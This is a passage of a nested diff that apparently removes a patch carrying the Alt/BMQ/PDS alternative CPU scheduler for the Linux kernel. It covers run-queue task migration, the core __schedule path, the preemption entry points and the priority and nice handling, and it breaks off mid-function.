-+#ifdef ALT_SCHED_DEBUG
-+void alt_sched_debug(void)
-+{
-+	printk(KERN_INFO "sched: pending: 0x%04lx, idle: 0x%04lx, sg_idle: 0x%04lx\n",
-+	       sched_rq_pending_mask.bits[0],
-+	       sched_idle_mask->bits[0],
-+	       sched_sg_idle_mask.bits[0]);
-+}
-+#else
-+inline void alt_sched_debug(void) {}
-+#endif
-+
-+#ifdef	CONFIG_SMP
-+
-+#ifdef CONFIG_PREEMPT_RT
-+#define SCHED_NR_MIGRATE_BREAK 8
-+#else
-+#define SCHED_NR_MIGRATE_BREAK 32
-+#endif
-+
-+const_debug unsigned int sysctl_sched_nr_migrate = SCHED_NR_MIGRATE_BREAK;
-+
-+/*
-+ * Migrate pending tasks in @rq to @dest_cpu
-+ */
-+static inline int
-+migrate_pending_tasks(struct rq *rq, struct rq *dest_rq, const int dest_cpu)
-+{
-+	struct task_struct *p, *skip = rq->curr;
-+	int nr_migrated = 0;
-+	int nr_tries = min(rq->nr_running / 2, sysctl_sched_nr_migrate);
-+
-+	while (skip != rq->idle && nr_tries &&
-+	       (p = sched_rq_next_task(skip, rq)) != rq->idle) {
-+		skip = sched_rq_next_task(p, rq);
-+		if (cpumask_test_cpu(dest_cpu, p->cpus_ptr)) {
-+			__SCHED_DEQUEUE_TASK(p, rq, 0);
-+			set_task_cpu(p, dest_cpu);
-+			sched_task_sanity_check(p, dest_rq);
-+			__SCHED_ENQUEUE_TASK(p, dest_rq, 0);
-+			nr_migrated++;
-+		}
-+		nr_tries--;
-+	}
-+
-+	return nr_migrated;
-+}
-+
-+static inline int take_other_rq_tasks(struct rq *rq, int cpu)
-+{
-+	struct cpumask *topo_mask, *end_mask;
-+
-+	if (unlikely(!rq->online))
-+		return 0;
-+
-+	if (cpumask_empty(&sched_rq_pending_mask))
-+		return 0;
-+
-+	topo_mask = per_cpu(sched_cpu_topo_masks, cpu) + 1;
-+	end_mask = per_cpu(sched_cpu_topo_end_mask, cpu);
-+	do {
-+		int i;
-+		for_each_cpu_and(i, &sched_rq_pending_mask, topo_mask) {
-+			int nr_migrated;
-+			struct rq *src_rq;
-+
-+			src_rq = cpu_rq(i);
-+			if (!do_raw_spin_trylock(&src_rq->lock))
-+				continue;
-+			spin_acquire(&src_rq->lock.dep_map,
-+				     SINGLE_DEPTH_NESTING, 1, _RET_IP_);
-+
-+			if ((nr_migrated = migrate_pending_tasks(src_rq, rq, cpu))) {
-+				src_rq->nr_running -= nr_migrated;
-+				if (src_rq->nr_running < 2)
-+					cpumask_clear_cpu(i, &sched_rq_pending_mask);
-+
-+				spin_release(&src_rq->lock.dep_map, _RET_IP_);
-+				do_raw_spin_unlock(&src_rq->lock);
-+
-+				rq->nr_running += nr_migrated;
-+				if (rq->nr_running > 1)
-+					cpumask_set_cpu(cpu, &sched_rq_pending_mask);
-+
-+				cpufreq_update_util(rq, 0);
-+
-+				return 1;
-+			}
-+
-+			spin_release(&src_rq->lock.dep_map, _RET_IP_);
-+			do_raw_spin_unlock(&src_rq->lock);
-+		}
-+	} while (++topo_mask < end_mask);
-+
-+	return 0;
-+}
-+#endif
-+
-+/*
-+ * Timeslices below RESCHED_NS are considered as good as expired as there's no
-+ * point rescheduling when there's so little time left.
-+ */
-+static inline void check_curr(struct task_struct *p, struct rq *rq)
-+{
-+	if (unlikely(rq->idle == p))
-+		return;
-+
-+	update_curr(rq, p);
-+
-+	if (p->time_slice < RESCHED_NS)
-+		time_slice_expired(p, rq);
-+}
-+
-+static inline struct task_struct *
-+choose_next_task(struct rq *rq, int cpu)
-+{
-+	struct task_struct *next;
-+
-+	if (unlikely(rq->skip)) {
-+		next = rq_runnable_task(rq);
-+		if (next == rq->idle) {
-+#ifdef	CONFIG_SMP
-+			if (!take_other_rq_tasks(rq, cpu)) {
-+#endif
-+				rq->skip = NULL;
-+				schedstat_inc(rq->sched_goidle);
-+				return next;
-+#ifdef	CONFIG_SMP
-+			}
-+			next = rq_runnable_task(rq);
-+#endif
-+		}
-+		rq->skip = NULL;
-+#ifdef CONFIG_HIGH_RES_TIMERS
-+		hrtick_start(rq, next->time_slice);
-+#endif
-+		return next;
-+	}
-+
-+	next = sched_rq_first_task(rq);
-+	if (next == rq->idle) {
-+#ifdef	CONFIG_SMP
-+		if (!take_other_rq_tasks(rq, cpu)) {
-+#endif
-+			schedstat_inc(rq->sched_goidle);
-+			/*printk(KERN_INFO "sched: choose_next_task(%d) idle %px\n", cpu, next);*/
-+			return next;
-+#ifdef	CONFIG_SMP
-+		}
-+		next = sched_rq_first_task(rq);
-+#endif
-+	}
-+#ifdef CONFIG_HIGH_RES_TIMERS
-+	hrtick_start(rq, next->time_slice);
-+#endif
-+	/*printk(KERN_INFO "sched: choose_next_task(%d) next %px\n", cpu,
-+	 * next);*/
-+	return next;
-+}
-+
-+/*
-+ * Constants for the sched_mode argument of __schedule().
-+ *
-+ * The mode argument allows RT enabled kernels to differentiate a
-+ * preemption from blocking on an 'sleeping' spin/rwlock. Note that
-+ * SM_MASK_PREEMPT for !RT has all bits set, which allows the compiler to
-+ * optimize the AND operation out and just check for zero.
-+ */
-+#define SM_NONE			0x0
-+#define SM_PREEMPT		0x1
-+#define SM_RTLOCK_WAIT		0x2
-+
-+#ifndef CONFIG_PREEMPT_RT
-+# define SM_MASK_PREEMPT	(~0U)
-+#else
-+# define SM_MASK_PREEMPT	SM_PREEMPT
-+#endif
-+
-+/*
-+ * schedule() is the main scheduler function.
-+ *
-+ * The main means of driving the scheduler and thus entering this function are:
-+ *
-+ *   1. Explicit blocking: mutex, semaphore, waitqueue, etc.
-+ *
-+ *   2. TIF_NEED_RESCHED flag is checked on interrupt and userspace return
-+ *      paths. For example, see arch/x86/entry_64.S.
-+ *
-+ *      To drive preemption between tasks, the scheduler sets the flag in timer
-+ *      interrupt handler scheduler_tick().
-+ *
-+ *   3. Wakeups don't really cause entry into schedule(). They add a
-+ *      task to the run-queue and that's it.
-+ *
-+ *      Now, if the new task added to the run-queue preempts the current
-+ *      task, then the wakeup sets TIF_NEED_RESCHED and schedule() gets
-+ *      called on the nearest possible occasion:
-+ *
-+ *       - If the kernel is preemptible (CONFIG_PREEMPTION=y):
-+ *
-+ *         - in syscall or exception context, at the next outmost
-+ *           preempt_enable(). (this might be as soon as the wake_up()'s
-+ *           spin_unlock()!)
-+ *
-+ *         - in IRQ context, return from interrupt-handler to
-+ *           preemptible context
-+ *
-+ *       - If the kernel is not preemptible (CONFIG_PREEMPTION is not set)
-+ *         then at the next:
-+ *
-+ *          - cond_resched() call
-+ *          - explicit schedule() call
-+ *          - return from syscall or exception to user-space
-+ *          - return from interrupt-handler to user-space
-+ *
-+ * WARNING: must be called with preemption disabled!
-+ */
-+static void __sched notrace __schedule(unsigned int sched_mode)
-+{
-+	struct task_struct *prev, *next;
-+	unsigned long *switch_count;
-+	unsigned long prev_state;
-+	struct rq *rq;
-+	int cpu;
-+	int deactivated = 0;
-+
-+	cpu = smp_processor_id();
-+	rq = cpu_rq(cpu);
-+	prev = rq->curr;
-+
-+	schedule_debug(prev, !!sched_mode);
-+
-+	/* by passing sched_feat(HRTICK) checking which Alt schedule FW doesn't support */
-+	hrtick_clear(rq);
-+
-+	local_irq_disable();
-+	rcu_note_context_switch(!!sched_mode);
-+
-+	/*
-+	 * Make sure that signal_pending_state()->signal_pending() below
-+	 * can't be reordered with __set_current_state(TASK_INTERRUPTIBLE)
-+	 * done by the caller to avoid the race with signal_wake_up():
-+	 *
-+	 * __set_current_state(@state)		signal_wake_up()
-+	 * schedule()				  set_tsk_thread_flag(p, TIF_SIGPENDING)
-+	 *					  wake_up_state(p, state)
-+	 *   LOCK rq->lock			    LOCK p->pi_state
-+	 *   smp_mb__after_spinlock()		    smp_mb__after_spinlock()
-+	 *     if (signal_pending_state())	    if (p->state & @state)
-+	 *
-+	 * Also, the membarrier system call requires a full memory barrier
-+	 * after coming from user-space, before storing to rq->curr.
-+	 */
-+	raw_spin_lock(&rq->lock);
-+	smp_mb__after_spinlock();
-+
-+	update_rq_clock(rq);
-+
-+	switch_count = &prev->nivcsw;
-+	/*
-+	 * We must load prev->state once (task_struct::state is volatile), such
-+	 * that we form a control dependency vs deactivate_task() below.
-+	 */
-+	prev_state = READ_ONCE(prev->__state);
-+	if (!(sched_mode & SM_MASK_PREEMPT) && prev_state) {
-+		if (signal_pending_state(prev_state, prev)) {
-+			WRITE_ONCE(prev->__state, TASK_RUNNING);
-+		} else {
-+			prev->sched_contributes_to_load =
-+				(prev_state & TASK_UNINTERRUPTIBLE) &&
-+				!(prev_state & TASK_NOLOAD) &&
-+				!(prev_state & TASK_FROZEN);
-+
-+			if (prev->sched_contributes_to_load)
-+				rq->nr_uninterruptible++;
-+
-+			/*
-+			 * __schedule()			ttwu()
-+			 *   prev_state = prev->state;    if (p->on_rq && ...)
-+			 *   if (prev_state)		    goto out;
-+			 *     p->on_rq = 0;		  smp_acquire__after_ctrl_dep();
-+			 *				  p->state = TASK_WAKING
-+			 *
-+			 * Where __schedule() and ttwu() have matching control dependencies.
-+			 *
-+			 * After this, schedule() must not care about p->state any more.
-+			 */
-+			sched_task_deactivate(prev, rq);
-+			deactivate_task(prev, rq);
-+			deactivated = 1;
-+
-+			if (prev->in_iowait) {
-+				atomic_inc(&rq->nr_iowait);
-+				delayacct_blkio_start();
-+			}
-+		}
-+		switch_count = &prev->nvcsw;
-+	}
-+
-+	check_curr(prev, rq);
-+
-+	next = choose_next_task(rq, cpu);
-+	clear_tsk_need_resched(prev);
-+	clear_preempt_need_resched();
-+#ifdef CONFIG_SCHED_DEBUG
-+	rq->last_seen_need_resched_ns = 0;
-+#endif
-+
-+	if (likely(prev != next)) {
-+		if (deactivated)
-+			update_sched_preempt_mask(rq);
-+		next->last_ran = rq->clock_task;
-+		rq->last_ts_switch = rq->clock;
-+
-+		rq->nr_switches++;
-+		/*
-+		 * RCU users of rcu_dereference(rq->curr) may not see
-+		 * changes to task_struct made by pick_next_task().
-+		 */
-+		RCU_INIT_POINTER(rq->curr, next);
-+		/*
-+		 * The membarrier system call requires each architecture
-+		 * to have a full memory barrier after updating
-+		 * rq->curr, before returning to user-space.
-+		 *
-+		 * Here are the schemes providing that barrier on the
-+		 * various architectures:
-+		 * - mm ? switch_mm() : mmdrop() for x86, s390, sparc, PowerPC.
-+		 *   switch_mm() rely on membarrier_arch_switch_mm() on PowerPC.
-+		 * - finish_lock_switch() for weakly-ordered
-+		 *   architectures where spin_unlock is a full barrier,
-+		 * - switch_to() for arm64 (weakly-ordered, spin_unlock
-+		 *   is a RELEASE barrier),
-+		 */
-+		++*switch_count;
-+
-+		psi_sched_switch(prev, next, !task_on_rq_queued(prev));
-+
-+		trace_sched_switch(sched_mode & SM_MASK_PREEMPT, prev, next, prev_state);
-+
-+		/* Also unlocks the rq: */
-+		rq = context_switch(rq, prev, next);
-+	} else {
-+		__balance_callbacks(rq);
-+		raw_spin_unlock_irq(&rq->lock);
-+	}
-+
-+#ifdef CONFIG_SCHED_SMT
-+	sg_balance(rq);
-+#endif
-+}
-+
-+void __noreturn do_task_dead(void)
-+{
-+	/* Causes final put_task_struct in finish_task_switch(): */
-+	set_special_state(TASK_DEAD);
-+
-+	/* Tell freezer to ignore us: */
-+	current->flags |= PF_NOFREEZE;
-+
-+	__schedule(SM_NONE);
-+	BUG();
-+
-+	/* Avoid "noreturn function does return" - but don't continue if BUG() is a NOP: */
-+	for (;;)
-+		cpu_relax();
-+}
-+
-+static inline void sched_submit_work(struct task_struct *tsk)
-+{
-+	unsigned int task_flags;
-+
-+	if (task_is_running(tsk))
-+		return;
-+
-+	task_flags = tsk->flags;
-+	/*
-+	 * If a worker goes to sleep, notify and ask workqueue whether it
-+	 * wants to wake up a task to maintain concurrency.
-+	 */
-+	if (task_flags & (PF_WQ_WORKER | PF_IO_WORKER)) {
-+		if (task_flags & PF_WQ_WORKER)
-+			wq_worker_sleeping(tsk);
-+		else
-+			io_wq_worker_sleeping(tsk);
-+	}
-+
-+	/*
-+	 * spinlock and rwlock must not flush block requests.  This will
-+	 * deadlock if the callback attempts to acquire a lock which is
-+	 * already acquired.
-+	 */
-+	SCHED_WARN_ON(current->__state & TASK_RTLOCK_WAIT);
-+
-+	/*
-+	 * If we are going to sleep and we have plugged IO queued,
-+	 * make sure to submit it to avoid deadlocks.
-+	 */
-+	blk_flush_plug(tsk->plug, true);
-+}
-+
-+static void sched_update_worker(struct task_struct *tsk)
-+{
-+	if (tsk->flags & (PF_WQ_WORKER | PF_IO_WORKER)) {
-+		if (tsk->flags & PF_WQ_WORKER)
-+			wq_worker_running(tsk);
-+		else
-+			io_wq_worker_running(tsk);
-+	}
-+}
-+
-+asmlinkage __visible void __sched schedule(void)
-+{
-+	struct task_struct *tsk = current;
-+
-+	sched_submit_work(tsk);
-+	do {
-+		preempt_disable();
-+		__schedule(SM_NONE);
-+		sched_preempt_enable_no_resched();
-+	} while (need_resched());
-+	sched_update_worker(tsk);
-+}
-+EXPORT_SYMBOL(schedule);
-+
-+/*
-+ * synchronize_rcu_tasks() makes sure that no task is stuck in preempted
-+ * state (have scheduled out non-voluntarily) by making sure that all
-+ * tasks have either left the run queue or have gone into user space.
-+ * As idle tasks do not do either, they must not ever be preempted
-+ * (schedule out non-voluntarily).
-+ *
-+ * schedule_idle() is similar to schedule_preempt_disable() except that it
-+ * never enables preemption because it does not call sched_submit_work().
-+ */
-+void __sched schedule_idle(void)
-+{
-+	/*
-+	 * As this skips calling sched_submit_work(), which the idle task does
-+	 * regardless because that function is a nop when the task is in a
-+	 * TASK_RUNNING state, make sure this isn't used someplace that the
-+	 * current task can be in any other state. Note, idle is always in the
-+	 * TASK_RUNNING state.
-+	 */
-+	WARN_ON_ONCE(current->__state);
-+	do {
-+		__schedule(SM_NONE);
-+	} while (need_resched());
-+}
-+
-+#if defined(CONFIG_CONTEXT_TRACKING_USER) && !defined(CONFIG_HAVE_CONTEXT_TRACKING_USER_OFFSTACK)
-+asmlinkage __visible void __sched schedule_user(void)
-+{
-+	/*
-+	 * If we come here after a random call to set_need_resched(),
-+	 * or we have been woken up remotely but the IPI has not yet arrived,
-+	 * we haven't yet exited the RCU idle mode. Do it here manually until
-+	 * we find a better solution.
-+	 *
-+	 * NB: There are buggy callers of this function.  Ideally we
-+	 * should warn if prev_state != CONTEXT_USER, but that will trigger
-+	 * too frequently to make sense yet.
-+	 */
-+	enum ctx_state prev_state = exception_enter();
-+	schedule();
-+	exception_exit(prev_state);
-+}
-+#endif
-+
-+/**
-+ * schedule_preempt_disabled - called with preemption disabled
-+ *
-+ * Returns with preemption disabled. Note: preempt_count must be 1
-+ */
-+void __sched schedule_preempt_disabled(void)
-+{
-+	sched_preempt_enable_no_resched();
-+	schedule();
-+	preempt_disable();
-+}
-+
-+#ifdef CONFIG_PREEMPT_RT
-+void __sched notrace schedule_rtlock(void)
-+{
-+	do {
-+		preempt_disable();
-+		__schedule(SM_RTLOCK_WAIT);
-+		sched_preempt_enable_no_resched();
-+	} while (need_resched());
-+}
-+NOKPROBE_SYMBOL(schedule_rtlock);
-+#endif
-+
-+static void __sched notrace preempt_schedule_common(void)
-+{
-+	do {
-+		/*
-+		 * Because the function tracer can trace preempt_count_sub()
-+		 * and it also uses preempt_enable/disable_notrace(), if
-+		 * NEED_RESCHED is set, the preempt_enable_notrace() called
-+		 * by the function tracer will call this function again and
-+		 * cause infinite recursion.
-+		 *
-+		 * Preemption must be disabled here before the function
-+		 * tracer can trace. Break up preempt_disable() into two
-+		 * calls. One to disable preemption without fear of being
-+		 * traced. The other to still record the preemption latency,
-+		 * which can also be traced by the function tracer.
-+		 */
-+		preempt_disable_notrace();
-+		preempt_latency_start(1);
-+		__schedule(SM_PREEMPT);
-+		preempt_latency_stop(1);
-+		preempt_enable_no_resched_notrace();
-+
-+		/*
-+		 * Check again in case we missed a preemption opportunity
-+		 * between schedule and now.
-+		 */
-+	} while (need_resched());
-+}
-+
-+#ifdef CONFIG_PREEMPTION
-+/*
-+ * This is the entry point to schedule() from in-kernel preemption
-+ * off of preempt_enable.
-+ */
-+asmlinkage __visible void __sched notrace preempt_schedule(void)
-+{
-+	/*
-+	 * If there is a non-zero preempt_count or interrupts are disabled,
-+	 * we do not want to preempt the current task. Just return..
-+	 */
-+	if (likely(!preemptible()))
-+		return;
-+
-+	preempt_schedule_common();
-+}
-+NOKPROBE_SYMBOL(preempt_schedule);
-+EXPORT_SYMBOL(preempt_schedule);
-+
-+#ifdef CONFIG_PREEMPT_DYNAMIC
-+#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
-+#ifndef preempt_schedule_dynamic_enabled
-+#define preempt_schedule_dynamic_enabled	preempt_schedule
-+#define preempt_schedule_dynamic_disabled	NULL
-+#endif
-+DEFINE_STATIC_CALL(preempt_schedule, preempt_schedule_dynamic_enabled);
-+EXPORT_STATIC_CALL_TRAMP(preempt_schedule);
-+#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
-+static DEFINE_STATIC_KEY_TRUE(sk_dynamic_preempt_schedule);
-+void __sched notrace dynamic_preempt_schedule(void)
-+{
-+	if (!static_branch_unlikely(&sk_dynamic_preempt_schedule))
-+		return;
-+	preempt_schedule();
-+}
-+NOKPROBE_SYMBOL(dynamic_preempt_schedule);
-+EXPORT_SYMBOL(dynamic_preempt_schedule);
-+#endif
-+#endif
-+
-+/**
-+ * preempt_schedule_notrace - preempt_schedule called by tracing
-+ *
-+ * The tracing infrastructure uses preempt_enable_notrace to prevent
-+ * recursion and tracing preempt enabling caused by the tracing
-+ * infrastructure itself. But as tracing can happen in areas coming
-+ * from userspace or just about to enter userspace, a preempt enable
-+ * can occur before user_exit() is called. This will cause the scheduler
-+ * to be called when the system is still in usermode.
-+ *
-+ * To prevent this, the preempt_enable_notrace will use this function
-+ * instead of preempt_schedule() to exit user context if needed before
-+ * calling the scheduler.
-+ */
-+asmlinkage __visible void __sched notrace preempt_schedule_notrace(void)
-+{
-+	enum ctx_state prev_ctx;
-+
-+	if (likely(!preemptible()))
-+		return;
-+
-+	do {
-+		/*
-+		 * Because the function tracer can trace preempt_count_sub()
-+		 * and it also uses preempt_enable/disable_notrace(), if
-+		 * NEED_RESCHED is set, the preempt_enable_notrace() called
-+		 * by the function tracer will call this function again and
-+		 * cause infinite recursion.
-+		 *
-+		 * Preemption must be disabled here before the function
-+		 * tracer can trace. Break up preempt_disable() into two
-+		 * calls. One to disable preemption without fear of being
-+		 * traced. The other to still record the preemption latency,
-+		 * which can also be traced by the function tracer.
-+		 */
-+		preempt_disable_notrace();
-+		preempt_latency_start(1);
-+		/*
-+		 * Needs preempt disabled in case user_exit() is traced
-+		 * and the tracer calls preempt_enable_notrace() causing
-+		 * an infinite recursion.
-+		 */
-+		prev_ctx = exception_enter();
-+		__schedule(SM_PREEMPT);
-+		exception_exit(prev_ctx);
-+
-+		preempt_latency_stop(1);
-+		preempt_enable_no_resched_notrace();
-+	} while (need_resched());
-+}
-+EXPORT_SYMBOL_GPL(preempt_schedule_notrace);
-+
-+#ifdef CONFIG_PREEMPT_DYNAMIC
-+#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
-+#ifndef preempt_schedule_notrace_dynamic_enabled
-+#define preempt_schedule_notrace_dynamic_enabled	preempt_schedule_notrace
-+#define preempt_schedule_notrace_dynamic_disabled	NULL
-+#endif
-+DEFINE_STATIC_CALL(preempt_schedule_notrace, preempt_schedule_notrace_dynamic_enabled);
-+EXPORT_STATIC_CALL_TRAMP(preempt_schedule_notrace);
-+#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
-+static DEFINE_STATIC_KEY_TRUE(sk_dynamic_preempt_schedule_notrace);
-+void __sched notrace dynamic_preempt_schedule_notrace(void)
-+{
-+	if (!static_branch_unlikely(&sk_dynamic_preempt_schedule_notrace))
-+		return;
-+	preempt_schedule_notrace();
-+}
-+NOKPROBE_SYMBOL(dynamic_preempt_schedule_notrace);
-+EXPORT_SYMBOL(dynamic_preempt_schedule_notrace);
-+#endif
-+#endif
-+
-+#endif /* CONFIG_PREEMPTION */
-+
-+/*
-+ * This is the entry point to schedule() from kernel preemption
-+ * off of irq context.
-+ * Note, that this is called and return with irqs disabled. This will
-+ * protect us against recursive calling from irq.
-+ */
-+asmlinkage __visible void __sched preempt_schedule_irq(void)
-+{
-+	enum ctx_state prev_state;
-+
-+	/* Catch callers which need to be fixed */
-+	BUG_ON(preempt_count() || !irqs_disabled());
-+
-+	prev_state = exception_enter();
-+
-+	do {
-+		preempt_disable();
-+		local_irq_enable();
-+		__schedule(SM_PREEMPT);
-+		local_irq_disable();
-+		sched_preempt_enable_no_resched();
-+	} while (need_resched());
-+
-+	exception_exit(prev_state);
-+}
-+
-+int default_wake_function(wait_queue_entry_t *curr, unsigned mode, int wake_flags,
-+			  void *key)
-+{
-+	WARN_ON_ONCE(IS_ENABLED(CONFIG_SCHED_DEBUG) && wake_flags & ~WF_SYNC);
-+	return try_to_wake_up(curr->private, mode, wake_flags);
-+}
-+EXPORT_SYMBOL(default_wake_function);
-+
-+static inline void check_task_changed(struct task_struct *p, struct rq *rq)
-+{
-+	int idx;
-+
-+	/* Trigger resched if task sched_prio has been modified. */
-+	if (task_on_rq_queued(p) && (idx = task_sched_prio_idx(p, rq)) != p->sq_idx) {
-+		requeue_task(p, rq, idx);
-+		check_preempt_curr(rq);
-+	}
-+}
-+
-+static void __setscheduler_prio(struct task_struct *p, int prio)
-+{
-+	p->prio = prio;
-+}
-+
-+#ifdef CONFIG_RT_MUTEXES
-+
-+static inline int __rt_effective_prio(struct task_struct *pi_task, int prio)
-+{
-+	if (pi_task)
-+		prio = min(prio, pi_task->prio);
-+
-+	return prio;
-+}
-+
-+static inline int rt_effective_prio(struct task_struct *p, int prio)
-+{
-+	struct task_struct *pi_task = rt_mutex_get_top_task(p);
-+
-+	return __rt_effective_prio(pi_task, prio);
-+}
-+
-+/*
-+ * rt_mutex_setprio - set the current priority of a task
-+ * @p: task to boost
-+ * @pi_task: donor task
-+ *
-+ * This function changes the 'effective' priority of a task. It does
-+ * not touch ->normal_prio like __setscheduler().
-+ *
-+ * Used by the rt_mutex code to implement priority inheritance
-+ * logic. Call site only calls if the priority of the task changed.
-+ */
-+void rt_mutex_setprio(struct task_struct *p, struct task_struct *pi_task)
-+{
-+	int prio;
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+
-+	/* XXX used to be waiter->prio, not waiter->task->prio */
-+	prio = __rt_effective_prio(pi_task, p->normal_prio);
-+
-+	/*
-+	 * If nothing changed; bail early.
-+	 */
-+	if (p->pi_top_task == pi_task && prio == p->prio)
-+		return;
-+
-+	rq = __task_access_lock(p, &lock);
-+	update_rq_clock(rq);
-+	/*
-+	 * Set under pi_lock && rq->lock, such that the value can be used under
-+	 * either lock.
-+	 *
-+	 * Note that there is loads of tricky to make this pointer cache work
-+	 * right. rt_mutex_slowunlock()+rt_mutex_postunlock() work together to
-+	 * ensure a task is de-boosted (pi_task is set to NULL) before the
-+	 * task is allowed to run again (and can exit). This ensures the pointer
-+	 * points to a blocked task -- which guarantees the task is present.
-+	 */
-+	p->pi_top_task = pi_task;
-+
-+	/*
-+	 * For FIFO/RR we only need to set prio, if that matches we're done.
-+	 */
-+	if (prio == p->prio)
-+		goto out_unlock;
-+
-+	/*
-+	 * Idle task boosting is a nono in general. There is one
-+	 * exception, when PREEMPT_RT and NOHZ is active:
-+	 *
-+	 * The idle task calls get_next_timer_interrupt() and holds
-+	 * the timer wheel base->lock on the CPU and another CPU wants
-+	 * to access the timer (probably to cancel it). We can safely
-+	 * ignore the boosting request, as the idle CPU runs this code
-+	 * with interrupts disabled and will complete the lock
-+	 * protected section without being interrupted. So there is no
-+	 * real need to boost.
-+	 */
-+	if (unlikely(p == rq->idle)) {
-+		WARN_ON(p != rq->curr);
-+		WARN_ON(p->pi_blocked_on);
-+		goto out_unlock;
-+	}
-+
-+	trace_sched_pi_setprio(p, pi_task);
-+
-+	__setscheduler_prio(p, prio);
-+
-+	check_task_changed(p, rq);
-+out_unlock:
-+	/* Avoid rq from going away on us: */
-+	preempt_disable();
-+
-+	__balance_callbacks(rq);
-+	__task_access_unlock(p, lock);
-+
-+	preempt_enable();
-+}
-+#else
-+static inline int rt_effective_prio(struct task_struct *p, int prio)
-+{
-+	return prio;
-+}
-+#endif
-+
-+void set_user_nice(struct task_struct *p, long nice)
-+{
-+	unsigned long flags;
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+
-+	if (task_nice(p) == nice || nice < MIN_NICE || nice > MAX_NICE)
-+		return;
-+	/*
-+	 * We have to be careful, if called from sys_setpriority(),
-+	 * the task might be in the middle of scheduling on another CPU.
-+	 */
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+	rq = __task_access_lock(p, &lock);
-+
-+	p->static_prio = NICE_TO_PRIO(nice);
-+	/*
-+	 * The RT priorities are set via sched_setscheduler(), but we still
-+	 * allow the 'normal' nice value to be set - but as expected
-+	 * it won't have any effect on scheduling until the task is
-+	 * not SCHED_NORMAL/SCHED_BATCH:
-+	 */
-+	if (task_has_rt_policy(p))
-+		goto out_unlock;
-+
-+	p->prio = effective_prio(p);
-+
-+	check_task_changed(p, rq);
-+out_unlock:
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+}
-+EXPORT_SYMBOL(set_user_nice);
-+
-+/*
-+ * is_nice_reduction - check if nice value is an actual reduction
-+ *
-+ * Similar to can_nice() but does not perform a capability check.
-+ *
-+ * @p: task
-+ * @nice: nice value
-+ */
-+static bool is_nice_reduction(const struct task_struct *p, const int nice)
-+{
-+	/* Convert nice value [19,-20] to rlimit style value [1,40]: */
-+	int nice_rlim = nice_to_rlimit(nice);
-+
-+	return (nice_rlim <= task_rlimit(p, RLIMIT_NICE));
-+}
-+
-+/*
-+ * can_nice - check if a task can reduce its nice value
-+ * @p: task
-+ * @nice: nice value
-+ */
-+int can_nice(const struct task_struct *p, const int nice)
-+{
-+	return is_nice_reduction(p, nice) || capable(CAP_SYS_NICE);
-+}
-+
-+#ifdef __ARCH_WANT_SYS_NICE
-+
-+/*
-+ * sys_nice - change the priority of the current process.
-+ * @increment: priority increment
-+ *
-+ * sys_setpriority is a more generic, but much slower function that
-+ * does similar things.
-+ */
-+SYSCALL_DEFINE1(nice, int, increment)
-+{
-+	long nice, retval;
-+
-+	/*
-+	 * Setpriority might change our priority at the same moment.
-+	 * We don't have to worry. Conceptually one call occurs first
-+	 * and we have a single winner.
-+	 */
-+
-+	increment = clamp(increment, -NICE_WIDTH, NICE_WIDTH);
-+	nice = task_nice(current) + increment;
-+
-+	nice = clamp_val(nice, MIN_NICE, MAX_NICE);
-+	if (increment < 0 && !can_nice(current, nice))
-+		return -EPERM;
-+
-+	retval = security_task_setnice(current, nice);
-+	if (retval)
-+		return retval;
-+
-+	set_user_nice(current, nice);
-+	return 0;
-+}
-+
-+#endif
-+
-+/**
-+ * task_prio - return the priority value of a given task.
-+ * @p: the task in question.
-+ *
-+ * Return: The priority value as seen by users in /proc.
-+ *
-+ * sched policy         return value   kernel prio    user prio/nice
-+ *
-+ * (BMQ)normal, batch, idle[0 ... 53]  [100 ... 139]          0/[-20 ... 19]/[-7 ... 7]
-+ * (PDS)normal, batch, idle[0 ... 39]            100          0/[-20 ... 19]
-+ * fifo, rr             [-1 ... -100]     [99 ... 0]  [0 ... 99]
-+ */
-+int task_prio(const struct task_struct *p)
-+{
-+	return (p->prio < MAX_RT_PRIO) ? p->prio - MAX_RT_PRIO :
-+		task_sched_prio_normal(p, task_rq(p));
-+}
-+
-+/**
-+ * idle_cpu - is a given CPU idle currently?
-+ * @cpu: the processor in question.
-+ *
-+ * Return: 1 if the CPU is currently idle. 0 otherwise.
-+ */
-+int idle_cpu(int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	if (rq->curr != rq->idle)
-+		return 0;
-+
-+	if (rq->nr_running)
-+		return 0;
-+
-+#ifdef CONFIG_SMP
-+	if (rq->ttwu_pending)
-+		return 0;
-+#endif
-+
-+	return 1;
-+}
-+
-+/**
-+ * idle_task - return the idle task for a given CPU.
-+ * @cpu: the processor in question.
-+ *
-+ * Return: The idle task for the cpu @cpu.
-+ */
-+struct task_struct *idle_task(int cpu)
-+{
-+	return cpu_rq(cpu)->idle;
-+}
-+
-+/**
-+ * find_process_by_pid - find a process with a matching PID value.
-+ * @pid: the pid in question.
-+ *
-+ * The task of @pid, if found. %NULL otherwise.
-+ */
-+static inline struct task_struct *find_process_by_pid(pid_t pid)
-+{
-+	return pid ? find_task_by_vpid(pid) : current;
-+}
-+
-+/*
-+ * sched_setparam() passes in -1 for its policy, to let the functions
-+ * it calls know not to change it.
-+ */
-+#define SETPARAM_POLICY -1
-+
-+static void __setscheduler_params(struct task_struct *p,
-+		const struct sched_attr *attr)
-+{
-+	int policy = attr->sched_policy;
-+
-+	if (policy == SETPARAM_POLICY)
-+		policy = p->policy;
-+
-+	p->policy = policy;
-+
-+	/*
-+	 * allow normal nice value to be set, but will not have any
-+	 * effect on scheduling until the task not SCHED_NORMAL/
-+	 * SCHED_BATCH
-+	 */
-+	p->static_prio = NICE_TO_PRIO(attr->sched_nice);
-+
-+	/*
-+	 * __sched_setscheduler() ensures attr->sched_priority == 0 when
-+	 * !rt_policy. Always setting this ensures that things like
-+	 * getparam()/getattr() don't report silly values for !rt tasks.
-+	 */
-+	p->rt_priority = attr->sched_priority;
-+	p->normal_prio = normal_prio(p);
-+}
-+
-+/*
-+ * check the target process has a UID that matches the current process's
-+ */
-+static bool check_same_owner(struct task_struct *p)
-+{
-+	const struct cred *cred = current_cred(), *pcred;
